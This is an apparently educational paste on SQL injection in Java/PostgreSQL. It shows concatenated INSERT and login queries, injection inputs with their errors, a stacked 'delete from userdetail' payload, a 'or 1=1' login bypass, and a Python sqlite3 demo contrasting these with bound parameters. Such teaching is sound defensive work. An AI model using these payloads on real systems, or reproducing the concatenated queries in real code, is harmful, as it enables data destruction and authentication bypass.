- SQL injection on PostgreSQL
- String insert ="insert into userdetail(username,id,sno) values('"+username+"','"+userid+"','"+no+"')";
- Statement stmt = conn.createStatement();
- stmt.executeUpdate(insert);
- ');DELETE FROM userdetail;
- org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "');"
- Position: 1
- ','',');DELETE FROM userdetail;
- 17:36:46,828 INFO [STDOUT] org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "''');"
- Position: 38
- foo', '42', '42'); delete from userdetail; --
- insert into userdetail(username,id,sno) values('foo', '42', '42');
- delete from userdetail;
- -- ','21','21')
- String sql = "SELECT count(*) FROM users WHERE username = '";
- sql += username;
- sql += "' AND password = '";
- sql += pwd;
- sql += "'";
- ' or 1=1 or '' = '
- SELECT count(*) FROM users WHERE username = 'arthur'
- AND password = '' or 1=1 or ''=''
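
The two concatenated statements above, run next to their bound-parameter forms against the same inputs. This is an added example, not part of the paste: it uses Python's built-in sqlite3 instead of the paste's Java/PostgreSQL stack so it runs offline, and the function names, TEXT column types and sample rows are assumptions.

```python
import sqlite3

STACKED = "foo', '42', '42'); delete from userdetail; --"  # input from the paste
TAUTOLOGY = "' or 1=1 or '' = '"                            # input from the paste

def make_db():
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE userdetail(username TEXT, id TEXT, sno TEXT);"
        "CREATE TABLE users(username TEXT, password TEXT);"
        "INSERT INTO userdetail VALUES ('alice', '1', '1');"
        "INSERT INTO users VALUES ('arthur', 's3cret');")
    return conn

def insert_concat(conn, username, userid, no):
    # Same string building as the paste. executescript() runs every statement
    # in the string, standing in (assumption) for a driver that does the same.
    sql = ("insert into userdetail(username,id,sno) values('"
           + username + "','" + userid + "','" + no + "')")
    conn.executescript(sql)

def insert_bound(conn, username, userid, no):
    # Values are sent separately from the SQL text and are never parsed as SQL.
    conn.execute("insert into userdetail(username,id,sno) values(?,?,?)",
                 (username, userid, no))

def login_concat(conn, username, pwd):
    sql = "SELECT count(*) FROM users WHERE username = '" + username
    sql += "' AND password = '" + pwd + "'"
    return conn.execute(sql).fetchone()[0]

def login_bound(conn, username, pwd):
    sql = "SELECT count(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, pwd)).fetchone()[0]

def row_count(conn):
    return conn.execute("SELECT count(*) FROM userdetail").fetchone()[0]

if __name__ == "__main__":
    for insert in (insert_concat, insert_bound):
        conn = make_db()
        insert(conn, STACKED, "21", "21")
        print(insert.__name__, "rows left in userdetail:", row_count(conn))
    conn = make_db()
    print("login_concat matches:", login_concat(conn, "arthur", TAUTOLOGY))
    print("login_bound matches:", login_bound(conn, "arthur", TAUTOLOGY))
```

In JDBC the bound form is a `PreparedStatement` with `?` placeholders and `setString` calls in place of `createStatement()` plus string concatenation.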